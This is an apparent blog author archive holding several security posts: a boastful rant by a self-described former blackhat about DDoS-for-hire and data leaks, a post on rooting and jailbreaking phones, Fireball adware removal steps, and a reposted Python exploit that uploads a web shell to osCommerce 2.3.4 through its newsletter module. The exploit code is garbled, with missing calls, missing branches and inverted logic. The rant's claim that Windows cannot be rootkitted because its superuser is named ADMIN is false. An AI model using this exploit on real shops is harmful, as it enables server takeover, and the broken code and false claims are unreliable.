Author Archives: admin

The Corporate World has no understanding of real Hackers – Windows Rootkits? Really?

The hubris of corporate security professionals and arrogance of white hat hackers has always been mocked by real hackers. School and certification training will teach you everything you need to know about hacking, security, defense and how the “script kiddies” operate.

There is such a disconnect between the real hacking world and the security community it amuses me greatly. Having previously been a true blackhat hacker paid to DDoS entire country uplinks or takeout the competitors of major corporations discreetly, leak customer and other protected information to those undisclosed corporations I speak with experience.

Real hackers DO NOT hack Windows, they trade rootlist and shells, zero day exploits, scanners and auto-rooters that the rest of the world is oblivious to. Windows hosts they infect for money, to use as proxy servers for hiding their identities, stealing credentials and personal information – that is about it.

When I was in the game I used Windows hosts to steal their ISP login information and credentials for websites they were members of. The game is about hacking infrastructure, *nix servers, cisco/brocade routers and maintaining access, pivoting and compromising enclaves and sniffing all traffic crossing the wire. Hackers do not care about home PC users regardless what the AV companies want you to believe. Crimeware actors care about Windows machines because they see dollar signs, hackers would be mocked and discredited if they bragged about hacking a Windows box.

For starters, hackers created rootkits in order to trojan processes on unix servers such as ps, netstat, lsof, utmp/wtmp and so on in order to hide and preserve access, not to mention cover themselves from log analysis. In order to facilitate this action you would have had to of rooted the server. The root account only exist in *nix and MAC OS hosts, which always amuses hackers as the corporate security and commercial world talks about rootkiting Microsoft Windows hosts which isn’t possible as the superuser account name is ADMIN!

Even on the Mirosoft site itself it describes rootkits now:

What is a rootkit?

Malware authors use rootkits to hide malware on your PC. Malware hidden by rootkits often monitor, filter, and steal your data or abuse your computer’s resources, such as using your PC for bitcoin mining.”


Share Button

Jailbreaking vs Rooting Smartphones Anroid iOS and is it illegal?

In the USA, under the DCMA, it’s legal to root your smartphone. However, rooting a tablet is illegal. This exemption grant came around 2012. In 2016, the overall picture is still unclear.

Jailbreaking a phone and “rooting” the phone are not exactly the same thing, however to the common smartphone user who wishes to accomplish either is typically only looking for the ability to load software, skins and make modifications to the phone without restriction.


jailbreaking is so widespread is because it lets you truly customize your phone. By default, the iPhone’s app icons, taskbar, clock, lock screen, widgets, settings, etc. aren’t configured in a way to let you change the colors, text, and theme, but jailbroken devices can install custom skins and other tools.

Also, jailbroken devices can be set up to let you remove apps that you can’t normally delete. For example, on some versions of the iPhone, you can’t remove the Mail, Notes or Weather app, but hacking tools lets you lift that restriction and truly remove those unwanted programs.


Rooting a smartphone means that you have root access on the device. Root is the super user account name on UNIX and Linux operating systems. In order to achieve root access on an Android device per say, there needs to be a vulnerability that can be exploited and achieve privilege escalation just like you would if you had a user account on a Red Hat linux machine. There have been vulnerabilities so far in every release of the Android operating system and this trend will most likely continue for sometime. Once you have root on your Android device the sky really is the limit, you have full access to install or delete anything you wish so BE CAREFUL!

Share Button

The FIREBALL PUP, PUA, Adware or Malware Outbreak? Or just a successful Adware Campaign?

FIREBALL Adware or Malware?

The malware, called Fireball, acts as a browser-hijacker but and can be turned into a full-functioning malware downloader. Fireball is capable of executing any code on the victim machines, resulting in a wide range of actions from stealing credentials to dropping additional malware.
Fireball is spread mostly via bundling i.e. installed on victim machines alongside a wanted program, often without the user’s consent.

Our current stance is that this is a Possibly Unwanted Program (PUP) or a Possibly Unwanted Application (PUA) as it shares common traits with adware and malware. It performs questionable clickfraud like activities but it can also be uninstalled which would be very rare for malware. Once the browser is closed all activity stops as well, that makes this more of a toolbar adware type deal which typically doesn’t qualify for the full malware branding.



Malware typically requires the host to be re-imaged to completely destroy all pieces of the malware, however FIREBALL can be uninstalled….proof of adware on crack?


To remove almost any adware, follow these simple steps:

  1. Uninstall the adware by removing the application from the Programs and Features list in the Windows Control Panel.


For Mac OS users:

  1. Use the Finder to locate the Applications
  2. Drag the suspicious file to the Trash.
  3. Empty the Trash.


Note – A usable program is not always installed on the machine and therefore may not be found on the program list.


  1. Scan and clean your machine, using:
  • Anti-Malware software
  • Adware cleaner software


  1. Remove malicious Add-ons, extensions or plug-ins from your browser:
On Google Chrome:a.       Click the Chrome menu icon and select Tools > Extensions.

b.      Locate and select any suspicious Add-ons.

c.       Click the trash can icon to delete.


On Internet Explorer:a.       Click the Setting icon and select Manage Add-ons.

b.      Locate and remove any malicious Add-ons.

On Mozilla Firefox:a.       Click the Firefox menu icon and go to the Tools tab.

b.      Select Add-ons > Extensions.

A new window opens.

c.       Remove any suspicious Add-ons.

d.      Go to the Add-ons manager > Plugins.

e.      Locate and disable any malicious plugins.


On Safari:a.       Make sure the browser is active.

b.      Click the Safari tab and select preferences.

A new window opens.

c.       Select the Extensions tab.

d.      Locate and uninstall any suspicious extensions.



  1. Restore your internet browser to its default settings:
On Google Chrome:a.       Click the Chrome menu icon, and select Settings.

b.      In the On startup section, click Set Pages.

c.       Delete the malicious pages from the Startup pages list.

d.      Find the Show Home button option and select Change.

e.      In the Open this page field, delete the malicious search engine page.

f.        In the Search section, select Manage search engines.

g.       Select the malicious search engine page and remove from the list.

On Internet Explorer:a.       Select the Tools tab and then select Internet Options.

A new window opens.

b.      In the Advanced tab, select Reset.

c.       Check the Delete personal settings box.

d.      Click the Reset button.

On Mozilla Firefox:a.       Enable the browser Menu Bar by clicking the blank space near the page tabs.

b.      Click the Help tab, and go to Troubleshooting information.

A new window opens.

c.       Select Reset Firefox.

On Safari:a.       Select the Safari tab and then select Preferences.

A new window opens.

b.      In the Privacy tab, the Manage Website Data… button.

A new window opens.

c.       Click the Remove All button.


Share Button

What is the Difference between Adware and Malware FIREBALL / Elex – WHAT YOU NEED TO KNOW!

A question I am frequently asked about is what is the difference between adware (legal software that will however overload you with ads and make money) vs. malware (crimeware to be specific). Typically there is a fine line between the two, a good example of a successful adware company is that of OpinionSpy/Marketscore which bundles its adware with legitamate software that is commonly downloaded via free download sites, the company has served up ads to its downloaders for over ten years now – you can see our article post of it here:

Analysis OSSProxy MarketScore OpinionSpy Adware/PUP/Trojan/Malware comScore vs Nielsen


You will notice that with Adware there is a key distinction, it has to include a user agreement (typically that long policy statement that you click through when installing software) and it has to be able to be removed without the use of a 3rd party program like MalwareBytes or another AV vendor. Adware will usually be hosted using friendly infrastructure like cloud services or known and trusted dedicated hosting providers such as cheap hosting providers at $1/mo like your Godaddy offer. Typically the adware is backed by a corporation or business and is hosted in a country like the United States where if they did anything illegal the domain and business would be seized.

Adware does not have a malicious incentive, it has a monetary one where it wants to generate revenue from ads, clicks or software downloads or selling your information to 3rd parties for marketing. Adware will not steal sensitive information, it may track your browsing habits which it typically does by using persistent cookies.

Malware on the other hand cannot be uninstalled from the control panel in 99.999999% of instances, the goal is to use compromised hosts and install software without the users knowledge or permission and generate revenue, steal passwords and sensitive information such as banking information or credit cards, use your internet connection for DDoS and the resale of botnets.

Infection vectors typically include malspam e-mails. exploit kits and exploitation as well as social engineering. Rarely will true malware be in a software bundle as the bundler would have to be in on the scheme. Malware infrastructure is typically the use of hacked hosts or shady infrastructure. Adware will show a running process when you run your task manager, typically malware will trojan your processes or will not allow you to kill the malware process or uninstall it.

A follow up article on the recent FIREBALL….is it malware or adware discussion will be on its way now that we have discussed the basic nature of adware and crimeware.

Share Button

E-Commerce PHP Shopping Cart Script osCommerce – Arbitrary File Upload Vulnerability Exploit Code




E-Commerce PHP Shopping Cart Script osCommerce – Arbitrary File Upload Vulnerability Exploit Code


# Exploit Title: osCommerce Authenticated Arbitrary File Upload
# Date: 11.11.2017
# Exploit Author: Simon Scannell - <>
# Vendor Homepage:
# Software Link:
# Version:, 2.3.4 - Other versions have not been tested but are likely to be vulnerable
# Tested on: Linux, Windows
osCommerce does by default not allow Users to upload arbitrary files from the Admin Panel. However, any user
being privileged enough to send newsletters can exploit an objection injection in the osCommerce core to
upload any file, allowing the user to gain shell access. The user does not need to be an administrator,
any account with access to the newsletters will do.
More details can be found here:
import urlparse
import argparse
import sys
import requests
DEFAULT_ADMIN_URL = "/catalog/admin/"
DEFAULT_NEWSLETTER_SCRIPT = "/catalog/admin/newsletters.php"
# Builds an authenticated session and returns it if it was successful
def authenticate(username, password, url):
    # Build the Session and grab the inital cookie
    session = requests.Session()
    session.get(url + "login.php", allow_redirects=False)
    get_params = {'action': "process"}
    data = {"username": username, "password": password}
    # Attempt the authentication
    r = + "login.php", data=data, params=get_params, allow_redirects=False)
    if r.status_code == 302:
        return session
        return False
def upload_file(local_filename, session, url):
    newsletter_script = url + "newsletters.php"
    r = session.get(newsletter_script, params={"action": "new"})
    payload = {
        'module': 'upload',
        'title': 'uploaded_fname',
        'content': './'
    # Create the vulnerable newsletter and grab its ID
    r =, params={"action": "insert"}, data=payload, allow_redirects=False)
        newsletter_id = urlparse.urlparse(r.headers['Location']).query[4:]
        print "[+] Successfully prepared the exploit and created a new newsletter with nID %s" % (newsletter_id)
        print "[-] The script wasn't able to create a new newsletter"
    # Now lock the newsletter
    r =, params={"action": "lock", "nID": newsletter_id})
    print "[+] Successfully locked the newsletter. Now attempting to upload.."
    # Send the final request, containing the file!
    files = {
        'uploaded_fname': open(local_filename)
    r =, params={"action": "send", "nID": newsletter_id}, files=files)
    print "[*] Now trying to verify that the file %s uploaded.." % (local_filename)
    shell_url = url + local_filename
    r = requests.get(shell_url)
    print "[+] Got a HTTP 200 Reply for the uploaded file!"
    print "[+] The uploaded file should now be available at %s" % (shell_url)
# Main Routine starts here
usage = " %s -u TARGET_URL -a AUTH -f FILE [-p ADMIN_PATH]\n\n" \
        "Example: %s -u http://localhost/path/to/osCommerce --auth=admin:admin_password -f shell.php\n\n" \
        "NOTE: For a more detailed description on the arguments use the -h switch\n\n\n" % (sys.argv[0], sys.argv[0])
parser = argparse.ArgumentParser(description='\n\nosCommerce 2.3.4 Authenticated Arbitrary File Upload', usage=usage)
parser.add_argument('-u', '--target-url', help='The target URL, including the path to the osCommerce installation (can also be document root /)', required=True)
parser.add_argument('-a', '--auth', help='Credentials for a privileged user in the format of username:password', required=True)
parser.add_argument('-f', '--file', help="The local file to be uploaded to the vulnerable webhost", required=True)
parser.add_argument('-p', '--admin-path', help="The path for the osCommerce Admin Area. This defaults to /catalog/admin/", required=False)
args = parser.parse_args()
# Parse username and password
username = args.auth.split(":")[0]
password = args.auth.split(":")[1]
url = args.target_url
# If the user hasn't passed a path to the osCommerce Admin Panel, use the default
if not args.admin_path:
    url += args.admin_path
# Authenticate the user and establish the connection
session = authenticate(username, password, url)
if not session:
    print "[-] The script wasn't able to authenticate itself to osCommerce. Are you sure that the credentials are correct? Is %s the Admin Path?" % (url + "login.php")
    print "[+] Authentication successful"
upload_file(args.file, session, url)


Share Button